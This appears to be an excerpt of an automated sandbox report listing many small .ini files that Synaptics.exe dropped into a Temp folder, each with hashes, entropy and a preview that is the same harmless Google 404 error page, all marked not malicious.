                                                                                                                                                                                        SHA1:DBE1D0F24A3113E5F0C573493A93D4AB3D37DCBC
                                                                                                                                                                                        SHA-256:8BD54CE6A98AE7EFA818817CDED2335989C23448F1380FC8E4697543232C1E43
                                                                                                                                                                                        SHA-512:0664A12304E59147C5CDF104082A75CF2C6E98EE69F532A652493AE459E9FD86CEFF3660E37F4561E4C84196AA71DE52EAD54168DD3ED65CA35C0A3BF56BC699
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VOp5LeGFj2cxnsdIbodOqQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\bEgXsYf.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.260321413549705
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0VSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+y+pAZewRDK4mW
                                                                                                                                                                                        MD5:140A45BA93DF5B2082B2A8088EB2817F
                                                                                                                                                                                        SHA1:BC30B669FD720553BBDC15A4B589ABB52B6D3D0E
                                                                                                                                                                                        SHA-256:6210B137D019C332818E301F7AF89E6B8E21C2870A1EECDB1C6C3E6C9A8FB44A
                                                                                                                                                                                        SHA-512:3F55673DBE6D8901FC9D94D03A8BCD7FEA1E13DE354EC5F72662C1B414A5424CEE4B4739AD219096008EAC81F81ECAB435BB7C9BBBFED7EAFBA98A33BADC0D16
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tzdU9ZLp59YOnlKuMEJ2mg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\bJk9Thq.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.264213321612191
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+M+pAZewRDK4mW
                                                                                                                                                                                        MD5:A7F7078137D1D30DCC2F58D2DF891533
                                                                                                                                                                                        SHA1:94032CA216DEE0DE992B786BA433F49CD4768BCB
                                                                                                                                                                                        SHA-256:3101469E2CC465026DEEEAE79B216422F289C6D602A3B52DD42E28975667D04A
                                                                                                                                                                                        SHA-512:A0D19EF14687932A26B5B1624C3011D5B4728592B5E70B8F84DAA0408A5CAD458485CA429249642C8F1677DC758855003E129B730F7F64AFFB5D3E4E2BB03BAC
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NUvWD8XFjdxd0sucwGQG6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\dUhULTt.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.254868831025516
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0txSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+g+pAZewRDK4mW
                                                                                                                                                                                        MD5:6220EDB152C3ABD31E65DA49E9EBF530
                                                                                                                                                                                        SHA1:F0973847B329CE172E208B1A19A97537A924D3D2
                                                                                                                                                                                        SHA-256:191D1161D698100A2B1B3F8EF0A70BF0BDB54C82716732EFE359008E5483A86F
                                                                                                                                                                                        SHA-512:36E91F3BB9432DECF1E1F10484BC8A8BAB611CA9C8E38FB5769A51A554D6CAA9F2286B08D8ABC432DA6F947FACA9CA7A20B673358D21362134E827C93CBDAA40
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xvQpDjNNlb33oyxZaT5Rfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\dbxHZXo.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.259039604298656
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0Z92iSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+sN+pAZewRDK4mW
                                                                                                                                                                                        MD5:ACDC403A98715FCFB3BB19F2378B2511
                                                                                                                                                                                        SHA1:7AFF690E0E801CCAEAD1101156DBDE8A134FF878
                                                                                                                                                                                        SHA-256:E69309D387F2695D90E13FE4F637A3485295A198409AA97BA34455F847C36F7E
                                                                                                                                                                                        SHA-512:EA6B4BA63BAB9953E307AC06DB35D5C7BE72C7781056E4AC2BC01DBA9FD403570B2C1AF540B2776C5DDA659B4CE47CB2DFBC4F85218F62773083BD6B6A612691
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GiKCy7h6/MF4HJxl1X1ibg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\djdqstX.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.273779819239174
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0uSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Z+pAZewRDK4mW
                                                                                                                                                                                        MD5:F7A1D6A4D6142AD129F64D81A320E6B4
                                                                                                                                                                                        SHA1:46FAB4A262FFC170DD7DF6A6BE6242D18F1B6D57
                                                                                                                                                                                        SHA-256:8A5B051DB227144A8B78418804D13E78C0B20C9E3F6B6EEAF1E5029D123581BA
                                                                                                                                                                                        SHA-512:AFF9782471E11BC05793D7FC35C90E5D5DBC0ACDB20EDFEFCF6E05479AF1E0D83F2CCD3334EDB5AB0CC4B7A0CC9424E3A3B6106165D011A8CB4B891A2A401EF2
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jqEuOHZ1J+YjBZ6oblmU8g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\dw9tqGK.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.264910495985136
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0k4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+t4+pAZewRDK4mW
                                                                                                                                                                                        MD5:D6CFC6E40BCABA0ED5B4BA3D4330417F
                                                                                                                                                                                        SHA1:68CBD19D3CF97F20619A00849F47E78E8247F0BE
                                                                                                                                                                                        SHA-256:911044E2506F0D787C25CA90A3DA8237D27AF5F772D8451F07B6C7046704FED1
                                                                                                                                                                                        SHA-512:606B2C322AA6C0155093959D72F4AF9911D090BB3BE9F35EFD15D3FF84260D5F74E683389FFA5364A9B8C4CCB6D77295E5CB7CAF3EDCE344C293A435A978BF83
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VWfvrpN6JMCZnER55b1zhw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\e6JVUfI.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2688326930778695
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0w867TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Dv+pAZewRDK4mW
                                                                                                                                                                                        MD5:42139FEFB72B5496C4D6D573AB7FE6D2
                                                                                                                                                                                        SHA1:71CFEFB7BB8670B9E24B93F5DAEE3CADCFAD3C43
                                                                                                                                                                                        SHA-256:D63BD609FE7973C622EE3DA390B2C4A45B169B971E90651C6510132639DFA4A5
                                                                                                                                                                                        SHA-512:FEF5461D148072FBC836A3733F66C1AB0B695D42535892E2996C92A7EAAB64C5869642A3C0902AB07C6C88066F09B8AA6B0B114F431436C1D1CC25AE144113C3
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VuW3cQQvxiZFihXAVL01JA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\eCU8if3.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.269367415573916
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+09bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+gb+pAZewRDK4mW
                                                                                                                                                                                        MD5:5D910EDB9C78D96E135DA4439E0C3950
                                                                                                                                                                                        SHA1:8D88CE0B2AFF4E344DEE3CA439F65F4DB54AD737
                                                                                                                                                                                        SHA-256:A8A409DFE13E7A10FF66AEB1BF150917E008585208845AA30890CFCA1DB4488A
                                                                                                                                                                                        SHA-512:FFB1A116B01026420AC135760B462A9A55BA0E0F36C20132D3F007C40CA4E4CC9C2607E70AEF9F94C7FD8A88102D1956234B1E087AD7117DE26DBFF2E85BFEDE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mBYZgdKoLyZL2j+n3BV0qQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\eEQUCux.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.258698475461306
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0iKISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+ZKI+pAZewRDK4mW
                                                                                                                                                                                        MD5:8FFCEBD9D92A38DB406E20F53BA23FFA
                                                                                                                                                                                        SHA1:0A64BB576512CE5A4ADF1BF7DB29A456E3F24962
                                                                                                                                                                                        SHA-256:B78DA6F1774FE7BB455A67A6B2F4E9E918D2E8AB1BB6E022A40ED3FEBA5C1C73
                                                                                                                                                                                        SHA-512:3B69108C70908180C8607C93E9A788F6099997EFA3C376FAD560408F9459C46DF5A09C6F236911F1313389E914B37B1E82C913666CA5E85802ADCD3328836590
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n4iMOH1isboQdWLrEy8yVA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\eXdeZ9p.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.266342841294224
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0dDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+m+pAZewRDK4mW
                                                                                                                                                                                        MD5:21528697E32756E446F201BF16DF0F8E
                                                                                                                                                                                        SHA1:E763E6F91019BC10360A5B0F61B58CC2B72375EE
                                                                                                                                                                                        SHA-256:47746524CDE57297316DBEA7336B3936F7608F85501D6407EC9124EF541F648B
                                                                                                                                                                                        SHA-512:E6FC96A75C7E7C2BFA65632D02A52D17BDF67CB03EF3FFAAC6D26CDB93059204016E8264E2002ACFAF1DB6378A64D93A2FED144B6D7176C604BA837694177BAA
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7m82uKQfuq8pgCW3O6hDCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ekcL5r1.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.258671231745452
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+R+pAZewRDK4mW
                                                                                                                                                                                        MD5:859E38B0A61E15642A420300B8E334FD
                                                                                                                                                                                        SHA1:25B4CEB0AF0D519665E989133241916DB02E26BE
                                                                                                                                                                                        SHA-256:01DF922BE3BF71F9F0082EC83A8FDB4422490FFD62E2135162C7BCF41CE84A6F
                                                                                                                                                                                        SHA-512:617028F61C82BA48866730B188C9236653FFEEEF16C76AAF5EBF51E4573B26F2B669B759DD60B59759F3C7BA04B090825A21476A7E55ED5763E68B3973FD5686
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pNxxhOCcVPBlcg0n9FP+oA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\gBIc8CV.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2510031852091945
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0iBESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+w+pAZewRDK4mW
                                                                                                                                                                                        MD5:C97975DE926B0B19EC110419D50DF542
                                                                                                                                                                                        SHA1:6E96FEBBCDFD54D41A293FC2BDBAB7712F601CAB
                                                                                                                                                                                        SHA-256:158EA249135B3E0A805F8CBC83BDEA874881113DF080D669FDFB491DBA0DF1CE
                                                                                                                                                                                        SHA-512:4A8888628AF1EE2EB8E2B07CDC6E0C743D16272F85E15D6BB99FCC0DE31FFB0C8A478AB929FBDD48B2FFB2B585B023FCECAB75EB56819C0D23828F0DB839E6E6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SRSpqg9wpEt42gOdhbtJlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\gOW9EIr.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2485759648942
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+W+pAZewRDK4mW
                                                                                                                                                                                        MD5:8A324E609AA5BAB5282CC66D7C6ACE46
                                                                                                                                                                                        SHA1:611F97AB922910FD28100D9DA3FA757FEF9E35C7
                                                                                                                                                                                        SHA-256:6621381CAE30BA96BBA513764AC508EBB6E0FE3DC4A2C76D941561637084EC5B
                                                                                                                                                                                        SHA-512:9B6EC8FF2F23F9CDE64F8952188DA1D825194723B2AB090FCC62E252B3137BF5A3A5B0595C5A70871A791BC3E61A7BDAB7EB0FD432806C42A6AE1D3C463DBCF8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TowDWepVcWq9+x4Ybreoew">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\gYPtTzF.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.244135241504611
                                                                                                                                                                                        Encrypted:false
